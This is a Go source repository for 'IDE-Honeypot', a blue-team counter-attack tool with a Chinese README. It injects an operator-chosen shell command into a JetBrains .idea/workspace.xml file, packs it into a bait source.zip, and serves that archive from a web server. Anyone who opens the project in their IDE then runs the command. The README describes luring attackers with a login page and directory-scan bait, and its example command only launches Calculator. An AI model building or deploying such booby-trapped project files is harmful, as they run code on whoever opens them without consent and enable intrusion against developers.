├── view
└── index.html
├── model
└── model.go
├── flags
├── flag.go
└── parse.go
├── source
└── source-1.3.2.iml
├── route
└── route.go
├── main.go
├── write
└── write.go
├── go.mod
├── zip
└── zip.go
├── README.md
└── go.sum
/view/index.html:
--------------------------------------------------------------------------------
1 | hello!!
--------------------------------------------------------------------------------
/model/model.go:
--------------------------------------------------------------------------------
1 | package model
2 |
3 | type Info struct {
4 | Host string
5 | Command string
6 | Zipname string
7 | Port string
8 | }
9 |
--------------------------------------------------------------------------------
/flags/flag.go:
--------------------------------------------------------------------------------
1 | package flags
2 |
3 | import (
4 | "flag"
5 | "ide-honeypot/model"
6 | )
7 |
8 | func Flag(info *model.Info) {
9 | flag.StringVar(&info.Host, "h", "", "Set host: -h 127.0.0.1")
10 | flag.StringVar(&info.Command, "c", "", "Set Command: -c whoami")
11 | flag.StringVar(&info.Zipname, "f", "", "Set Filename: -f source")
12 | flag.StringVar(&info.Port, "p", "", "Set Port: -p 8080")
13 | flag.Parse()
14 | }
15 |
--------------------------------------------------------------------------------
/source/source-1.3.2.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/flags/parse.go:
--------------------------------------------------------------------------------
1 | package flags
2 |
3 | import (
4 | "fmt"
5 | "ide-honeypot/model"
6 | "os"
7 | )
8 |
9 | func Parse(info *model.Info) {
10 | if info.Command == "" {
11 | fmt.Println("You should set command \n Example:\n ide-honeypot -h 0.0.0.0 -c whoami -f zipname -p 8080")
12 | os.Exit(0)
13 | }
14 | if info.Host == "" {
15 | fmt.Println("You should set host \n Example:\n ide-honeypot -h 0.0.0.0 -c whoami -f zipname -p 8080")
16 | os.Exit(0)
17 | }
18 | if info.Port == "" {
19 | info.Port = "8080"
20 | }
21 | if info.Zipname == "" {
22 | info.Zipname = "source.zip"
23 | }
24 |
25 | }
26 |
--------------------------------------------------------------------------------
/route/route.go:
--------------------------------------------------------------------------------
1 | package route
2 |
3 | import (
4 | "github.com/gin-gonic/gin"
5 | "ide-honeypot/model"
6 | "log"
7 | "net/http"
8 | )
9 |
10 | func Init(info model.Info) {
11 | //gin发布模式
12 | gin.SetMode(gin.ReleaseMode)
13 | r := gin.Default()
14 |
15 | //注册静态文件路由
16 | r.LoadHTMLGlob("view/*")
17 | r.Static("/js", "./js")
18 | r.Static("/css", "./css")
19 | r.Static("/img", "./img")
20 | r.Static("/fonts", "./fonts")
21 | r.StaticFile("favicon.ico", "./favicon.ico")
22 |
23 | //注册路由
24 | r.GET("/", func(c *gin.Context) {
25 | c.HTML(http.StatusOK, "index.html", gin.H{})
26 | })
27 | r.GET("/"+info.Zipname+".zip", func(context *gin.Context) {
28 | context.File(info.Zipname + ".zip")
29 | })
30 | log.Println("服务将启动在" + info.Host + ":" + info.Port)
31 | r.Run(info.Host + ":" + info.Port)
32 | }
33 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "fmt"
5 | "ide-honeypot/flags"
6 | "ide-honeypot/model"
7 | "ide-honeypot/route"
8 | "ide-honeypot/write"
9 | "ide-honeypot/zip"
10 | "log"
11 | )
12 |
13 | func main() {
14 | banner()
15 | var info model.Info
16 | flags.Flag(&info)
17 | log.Println("嵌入的命令为" + info.Command)
18 | flags.Parse(&info)
19 | write.Write(info)
20 | zip.Zip("source", info.Zipname+".zip")
21 | write.WriteOld(info.Command)
22 | route.Init(info)
23 |
24 | }
25 |
26 | func banner() {
27 | fmt.Println("\n\n ___ ___ ___ _ _ _ \n |_ _| \\| _____| || |___ _ _ ___ _ _ _ __ ___| |_ \n | || |) | _|___| __ / _ | ' \\/ -_| || | '_ / _ | _|\n |___|___/|___| |_||_\\___|_||_\\___|\\_, | .__\\___/\\__|\n |__/|_| \n")
28 | fmt.Println(" IDE-Honeypot by WenD1l\n")
29 | }
30 |
--------------------------------------------------------------------------------
/write/write.go:
--------------------------------------------------------------------------------
1 | package write
2 |
3 | import (
4 | "ide-honeypot/model"
5 | "log"
6 | "os"
7 | "strings"
8 | )
9 |
10 | func Write(info model.Info) {
11 | content, err := os.ReadFile("source/.idea/workspace.xml")
12 | if err != nil {
13 | panic(err)
14 | }
15 | content = []byte(strings.Replace(string(content), "$COMMAND", info.Command, 1))
16 | err = os.WriteFile("source/.idea/workspace.xml", content, 0755)
17 | if err != nil {
18 | panic(err)
19 | }
20 | log.Println("已将命令写入workspace.xml")
21 |
22 | }
23 |
24 | func WriteOld(new string) {
25 | old := "$COMMAND"
26 |
27 | content, err := os.ReadFile("source/.idea/workspace.xml")
28 | if err != nil {
29 | panic(err)
30 | }
31 | content = []byte(strings.Replace(string(content), new, old, 1))
32 | err = os.WriteFile("source/.idea/workspace.xml", content, 0755)
33 | if err != nil {
34 | panic(err)
35 | }
36 |
37 | log.Println("已恢复workspace.xml文件")
38 | }
39 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module ide-honeypot
2 |
3 | go 1.17
4 |
5 | require (
6 | github.com/gin-contrib/sse v0.1.0 // indirect
7 | github.com/gin-gonic/gin v1.8.1 // indirect
8 | github.com/go-playground/locales v0.14.0 // indirect
9 | github.com/go-playground/universal-translator v0.18.0 // indirect
10 | github.com/go-playground/validator/v10 v10.11.0 // indirect
11 | github.com/goccy/go-json v0.9.8 // indirect
12 | github.com/json-iterator/go v1.1.12 // indirect
13 | github.com/leodido/go-urn v1.2.1 // indirect
14 | github.com/mattn/go-isatty v0.0.14 // indirect
15 | github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421 // indirect
16 | github.com/modern-go/reflect2 v1.0.2 // indirect
17 | github.com/pelletier/go-toml/v2 v2.0.2 // indirect
18 | github.com/ugorji/go/codec v1.2.7 // indirect
19 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d // indirect
20 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2 // indirect
21 | golang.org/x/sys v0.0.0-20220708085239-5a0f0661e09d // indirect
22 | golang.org/x/text v0.3.7 // indirect
23 | google.golang.org/protobuf v1.28.0 // indirect
24 | gopkg.in/yaml.v2 v2.4.0 // indirect
25 | )
26 |
--------------------------------------------------------------------------------
/zip/zip.go:
--------------------------------------------------------------------------------
1 | package zip
2 |
3 | import (
4 | "archive/zip"
5 | "io"
6 | "log"
7 | "os"
8 | "path/filepath"
9 | "strings"
10 | )
11 |
12 | func Zip(src_dir string, zip_file_name string) {
13 |
14 | // 预防:旧文件无法覆盖
15 | os.RemoveAll(zip_file_name)
16 |
17 | // 创建:zip文件
18 | zipfile, _ := os.Create(zip_file_name)
19 | defer zipfile.Close()
20 |
21 | // 打开:zip文件
22 | archive := zip.NewWriter(zipfile)
23 | defer archive.Close()
24 |
25 | // 遍历路径信息
26 | filepath.Walk(src_dir, func(path string, info os.FileInfo, _ error) error {
27 |
28 | // 如果是源路径,提前进行下一个遍历
29 | if path == src_dir {
30 | return nil
31 | }
32 |
33 | // 获取:文件头信息
34 | header, _ := zip.FileInfoHeader(info)
35 | header.Name = strings.TrimPrefix(path, src_dir+`/`)
36 |
37 | // 判断:文件是不是文件夹
38 | if info.IsDir() {
39 | header.Name += `/`
40 | } else {
41 | // 设置:zip的文件压缩算法
42 | header.Method = zip.Deflate
43 | }
44 |
45 | // 创建:压缩包头部信息
46 | writer, _ := archive.CreateHeader(header)
47 | if !info.IsDir() {
48 | file, _ := os.Open(path)
49 | defer file.Close()
50 | io.Copy(writer, file)
51 | }
52 | return nil
53 | })
54 | log.Println("已生成" + zip_file_name)
55 | }
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 一款针对于IDE的反制蜜罐 IDE-Honeypot
2 |
3 | > 无意中看到了这位师傅的 [利用项目配置文件进行-RCE-IDE-Trust-Project-功能探究](https://rmb122.com/2021/10/02/%E5%88%A9%E7%94%A8%E9%A1%B9%E7%9B%AE%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C-RCE-IDE-Trust-Project-%E5%8A%9F%E8%83%BD%E6%8E%A2%E7%A9%B6/)
4 |
5 | > 复现之后觉得很有意思,结合自身,在网站下到源码也是第一时间开ide审计,所以稍加修改,把这个项目实战化
6 |
7 | > 本项目使用gin框架开发
8 |
9 | ## 运行
10 |
11 | 
12 |
13 | ## 基本配置
14 |
15 | · view 目录下放index.html模板文件
16 |
17 | · js/css/fonts/img 等目录则是放静态资源
18 |
19 | · favicon.ico放在与main.go同级目录(也可以不需要)
20 |
21 | · source目录则是jb小子要打开的目录,src下可以放一下没用的源码增加zip包体积诱惑攻击队
22 |
23 | ## 反制思路
24 |
25 | 当jb小子对网站进行目录扫描时,发现一个源码包,恰好又会点代审,便会落入蓝队的陷阱
26 |
27 | 前端的页面推荐使用登录框,使得jb小子束手无策时把思路转向目录扫描,zip包名称推荐 source.zip [子域名].zip 等
28 |
29 | ※ 需要注意的是,idea 2020.3.3 之后的版本加入了安全模式,会在控制询问是否执行
30 |
31 | ## 使用方法
32 |
33 | ```
34 | ./ide-honeypot -h [address] -p [port] -f [zipfilename] -c [command]
35 | ```
36 |
37 | zipfilename不用加后缀,默认是zip包
38 | port端口参数可以不需要,默认8080
39 |
40 | example:
41 |
42 | ```
43 | ./ide-honeypot -h 0.0.0.0 -p 6789 -f source -c "open /System/Applications/Calculator.app/Contents/MacOS/Calculator"
44 | ```
45 | ## 支持平台
46 |
47 | · ✅Linux
48 |
49 | · ✅Windows
50 |
51 | · ✅MacOS
52 |
53 | 只需要在静态文件放进对应的文件夹之后运行:
54 |
55 | ```
56 | go build main.go
57 | ```
58 |
59 | 生成可执行文件即可
60 |
61 | ## 演示视频:
62 |
63 | [演示视频](https://www.bilibili.com/video/BV1JY4y1J7NQ/)
64 |
65 | ## 项目后续计划
66 |
67 | □ 加入vscode反制
68 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
2 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
3 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
4 | github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE=
5 | github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI=
6 | github.com/gin-gonic/gin v1.8.1 h1:4+fr/el88TOO3ewCmQr8cx/CtZ/umlIRIs5M4NTNjf8=
7 | github.com/gin-gonic/gin v1.8.1/go.mod h1:ji8BvRH1azfM+SYow9zQ6SZMvR8qOMZHmsCuWR9tTTk=
8 | github.com/go-playground/assert/v2 v2.0.1/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4=
9 | github.com/go-playground/locales v0.14.0 h1:u50s323jtVGugKlcYeyzC0etD1HifMjqmJqb8WugfUU=
10 | github.com/go-playground/locales v0.14.0/go.mod h1:sawfccIbzZTqEDETgFXqTho0QybSa7l++s0DH+LDiLs=
11 | github.com/go-playground/universal-translator v0.18.0 h1:82dyy6p4OuJq4/CByFNOn/jYrnRPArHwAcmLoJZxyho=
12 | github.com/go-playground/universal-translator v0.18.0/go.mod h1:UvRDBj+xPUEGrFYl+lu/H90nyDXpg0fqeB/AQUGNTVA=
13 | github.com/go-playground/validator/v10 v10.11.0 h1:0W+xRM511GY47Yy3bZUbJVitCNg2BOGlCyvTqsp/xIw=
14 | github.com/go-playground/validator/v10 v10.11.0/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU=
15 | github.com/goccy/go-json v0.9.8 h1:DxXB6MLd6yyel7CLph8EwNIonUtVZd3Ue5iRcL4DQCE=
16 | github.com/goccy/go-json v0.9.8/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I=
17 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
18 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
19 | github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
20 | github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
21 | github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
22 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
23 | github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI=
24 | github.com/kr/pretty v0.3.0/go.mod h1:640gp4NfQd8pI5XOwp5fnNeVWj67G7CFk/SaSQn7NBk=
25 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
26 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
27 | github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
28 | github.com/leodido/go-urn v1.2.1 h1:BqpAaACuzVSgi/VLzGZIobT2z4v53pjosyNd9Yv6n/w=
29 | github.com/leodido/go-urn v1.2.1/go.mod h1:zt4jvISO2HfUBqxjfIshjdMTYS56ZS/qv49ictyFfxY=
30 | github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y=
31 | github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
32 | github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421 h1:ZqeYNhU3OHLH3mGKHDcjJRFFRrJa6eAM5H+CtDdOsPc=
33 | github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
34 | github.com/modern-go/reflect2 v1.0.2 h1:xBagoLtFs94CBntxluKeaWgTMpvLxC4ur3nMaC9Gz0M=
35 | github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk=
36 | github.com/pelletier/go-toml/v2 v2.0.2 h1:+jQXlF3scKIcSEKkdHzXhCTDLPFi5r1wnK6yPS+49Gw=
37 | github.com/pelletier/go-toml/v2 v2.0.2/go.mod h1:MovirKjgVRESsAvNZlAjtFwV867yGuwRkXbG66OzopI=
38 | github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e/go.mod h1:pJLUxLENpZxwdsKMEsNbx1VGcRFpLqf3715MtcvvzbA=
39 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
40 | github.com/rogpeppe/go-internal v1.6.1/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc=
41 | github.com/rogpeppe/go-internal v1.8.0/go.mod h1:WmiCO8CzOY8rg0OYDC4/i/2WRWAB6poM+XZ2dLUbcbE=
42 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
43 | github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
44 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
45 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
46 | github.com/stretchr/testify v1.7.2/go.mod h1:R6va5+xMeoiuVRoj+gSkQ7d3FALtqAAGI1FQKckRals=
47 | github.com/ugorji/go v1.2.7 h1:qYhyWUUd6WbiM+C6JZAUkIJt/1WrjzNHY9+KCIjVqTo=
48 | github.com/ugorji/go v1.2.7/go.mod h1:nF9osbDWLy6bDVv/Rtoh6QgnvNDpmCalQV5urGCCS6M=
49 | github.com/ugorji/go/codec v1.2.7 h1:YPXUKf7fYbp/y8xloBqZOw2qaVggbfwMlI8WM3wZUJ0=
50 | github.com/ugorji/go/codec v1.2.7/go.mod h1:WGN1fab3R1fzQlVQTkfxVtIBhWDRqOviHU95kRgeqEY=
51 | golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
52 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d h1:sK3txAijHtOK88l68nt020reeT1ZdKLIYetKl95FzVY=
53 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
54 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2 h1:CIJ76btIcR3eFI5EgSo6k1qKw9KJexJuRLI9G7Hp5wE=
55 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
56 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
57 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
58 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
59 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
60 | golang.org/x/sys v0.0.0-20210806184541-e5e7981a1069/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
61 | golang.org/x/sys v0.0.0-20220708085239-5a0f0661e09d h1:/m5NbqQelATgoSPVC2Z23sR4kVNokFwDDyWh/3rGY+I=
62 | golang.org/x/sys v0.0.0-20220708085239-5a0f0661e09d/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
63 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
64 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
65 | golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk=
66 | golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
67 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
68 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
69 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
70 | google.golang.org/protobuf v1.28.0 h1:w43yiav+6bVFTBQFZX0r7ipe9JQ1QsbMgHwbBziscLw=
71 | google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
72 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
73 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
74 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
75 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
76 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
77 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
78 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
79 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
80 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
81 |
--------------------------------------------------------------------------------